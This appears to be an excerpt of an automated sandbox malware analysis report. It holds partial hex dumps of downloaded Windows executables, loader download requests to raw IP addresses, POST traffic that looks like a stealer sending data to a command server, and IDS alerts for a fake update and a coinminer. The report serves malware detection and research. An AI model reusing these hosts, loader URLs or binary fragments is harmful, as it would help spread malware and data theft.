00 46 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 09 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 43 00 00 00 a0 09 00 00 44 00 00 00 5e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 6e 05 00 00 f0 09 00 00 6e 05 00 00 a2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 6e 05 00 00 60 0f 00 00 6e 05 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:18:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 13:30:23 GMTETag: "3daa00-62fac821ad56f"Accept-Ranges: bytesContent-Length: 4041216Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 73 80 a0 e2 12 ee f3 e2 12 ee f3 e2 12 ee f3 a9 6a ed f2 f0 12 ee f3 a9 6a eb f2 7d 12 ee f3 a9 6a ea f2 f4 12 ee f3 f7 6d eb f2 c4 12 ee f3 f7 6d ea f2 f3 12 ee f3 f7 6d ed f2 f7 12 ee f3 a9 6a ef f2 ed 12 ee f3 e2 12 ef f3 6b 12 ee f3 e2 12 ee f3 e3 12 ee f3 c5 d4 83 f3 e3 12 ee f3 d8 92 ea f2 e8 12 ee f3 d8 92 11 f3 e3 12 ee f3 d8 92 ec f2 e3 12 ee f3 52 69 63 68 e2 12 ee f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 18 07 00 00 a2 00 00 00 00 00 00 47 3c 18 00 00 10 00 00 00 30 07 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 40 00 00 04 00 00 62 dc 3d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 f0 07 00 dc 00 00 00 00 a0 07 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 5c 17 07 00 00 10 00 00 00 1e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 b4 56 00 00 00 30 07 00 00 28 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 1e 0d 00 00 00 90 07 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 07 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 38 00 00 00 b0 07 00 00 1a 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 f0 07 00 00 02 00 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 68 65 6d 69 64 61 00 40 38 00 00 00 08 00 00 40 38 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:18:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 17:35:05 GMTETag: "15600-63028a03aa5c5"Accept-Ranges: bytesContent-Length: 87552Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d af d5 a9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 01 00 00 0c 00 00 00 00 00 00 be 67 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 67 01 00 57 00 00 00 00 80 01 00 99 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 47 01 00 00 20 00 00 00 48 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 99 08 00 00 00 80 01 00 00 0a 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 67 01 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 64 00 00 d8 02 01 00 01 00 00 00 36 01 00 06 70 64 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 02 00 00 00 90 77 53 de 00 00 00 00 49 44 41 54 90 db 7d 47 00 00 00 00 49 45 4e 44 ae 42 60 82 00 00 00 1e 02 28 57 00 00 0a 2a 1b 30 04 00 fa 01 00 00 01 00 00 11 00 02 28 ce 00 00 06 0a 20 d1 08 14 a7 20 0f 1b 98 9d 61 25 13 07 1c 5e 45 06 00 00 00 52 00 00 00 2b 00 00 00 3c 00 00 00 d3 ff ff ff 02 00 00 00 18 00 00 00 2b 50 7e 11 00 00 0a 0b 11 07 20 38 be d9 42 5a 20 00 c5 ce 1a 61 2b c0 06 2c 28 11 07 20 bf 65 c0 c6 5a 20 76 9e e6 dc 61 2b ad 00 11 07 20 eb 3f 61 2e 5a 20 c6 b6 cd b4 61 2b 9c 06 8e 16 fe 03 2b 01 16 0c 08 39 6d 01 00 00 20 c6 aa 61 8e 2b 86 06 28 cf 00 00 06 0d 09 16 28 d0 00 00 06 13 04 11 04 28 d1 00 00 06 13 05 00 20 65 65 48 91 20 0f 1b 98 9d 61 25 13 07 19 5e 45 03 00 00 00 df ff ff ff 1b 00 00 00 02 00 00 00 2b 19 11 05 28 d2 00 00 06 0b 00 11 07 20 fa 57 9f df 5a 20 1f 58 7d c8 61 2b c9 de 54 11 05 2c 4f 20 22 3d 85 e7 20 0f 1b 9
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:18:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 17:35:06 GMTETag: "6b200-63028a047c524"Accept-Ranges: bytesContent-Length: 438784Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 28 d4 c9 86 9d e1 22 6b 0a cf d6 90 8e 26 40 db d0 de a5 c8 32 ba 48 42 b5 63 24 1f bc e4 56 92 d8 a1 3c 1a b4 c9 58 58 1f 3e bf 88 be c5 8e b4 c2 f8 85 e7 4c 1b 91 93 a7 16 00 01 00 00 0b 51 d1 00 94 c1 a0 f0 94 9a c9 35 4c f4 a7 89 67 78 cb 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 73 c5 d1 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d ed 88 04 00 04 38 03 00 00 30 00 00 80 e4 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 99 fb 06 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c e4 03 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 d1 03 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 5d 02 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 dc e9 00 00 00 70 02 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 cc 21 00 00 00 60 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 30 00 00 00 90 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 02 00 00 00 00 00 00 00 00 fc 00 00 00 00 c0 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 60 2b 02 00 00 d0 03 00 00 2c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 185.170.153.104:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 5.252.153.122:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/29/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: SOLTIAES SOLTIAES
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 149.154.167.99:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.32.1:443
                      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49740 -> 147.45.124.241:80
                      Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:49740 -> 147.45.124.241:80
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=mOkelA10FgBwO7FMFJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19635Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S3lZOPEbbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1S54YTvLWrfzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20415Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Cno8wxpy7LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586869Host: menuedgarli.shop
                      Source: global trafficHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: menuedgarli.shop
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
                      Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 185.170.153.104:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 5.252.153.122:3000Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/29/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
                      Source: global trafficDNS traffic detected: DNS query: t.me
                      Source: global trafficDNS traffic detected: DNS query: menuedgarli.shop
                      Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                      Source: unknownHTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: menuedgarli.shop
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/NSADtTurT7Y.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/Ng
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
                      Source: RtkAudUService64a.exe, 00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1530677617.0000000003D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.g
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1713028166.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.00000000015B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1712606006.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1755984216.0000000001595000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2381772054.0000000001599000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
